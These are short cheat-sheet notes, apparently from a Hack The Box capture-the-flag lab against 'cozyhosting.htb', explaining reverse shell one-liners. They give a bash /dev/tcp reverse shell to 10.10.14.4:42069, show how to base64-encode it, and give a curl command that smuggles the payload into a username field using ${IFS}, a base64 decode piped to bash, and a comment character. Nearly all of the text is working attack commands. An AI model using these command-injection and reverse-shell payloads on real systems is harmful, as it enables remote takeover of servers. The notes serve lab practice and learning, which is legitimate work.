Reverse shell one liners

• bash -c 'bash -i >& /dev/tcp/10.10.14.4/42069 0>&1'
  • wrapping the bash rev shell with a bash -c allows the reverse shell to persist if the connection drops
• base64 encoding to avoid space errors.
  • echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.4/42069 0>&1'" | base64 -w0
  • take output
    • bash -c '...' — explicitly spawns a new bash process to run the string
    • -n = no trailing newline (clean base64 output)
    • -e = enable escape sequences (not needed here, but doesn't hurt)
    • -w0 flag on base64 Disables line wrapping — outputs the entire base64 string on one line (important! line breaks would break the injection)
• $ curl http://cozyhosting.htb/executessh --data-urlencode 'host=127.0.0.1' --data-urlencode 'username=admin;echo${IFS}YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQyMDY5IDA+JjEn=|base64${IFS}-d|bash;#' -v
  • -d = Flag for base64 — means decode.
    • Converts the base64 string back to plaintext
  • bash = Executes the decoded string as a bash
    • command (this is what launches your reverse shell
  • ; = Terminates the injected command cleanly
    • # = Bash comment — everything after this is ignored. This kills the @127.0.0.1 that the server appends
  • -v
    • verbose mode, shows request/response headers in your terminal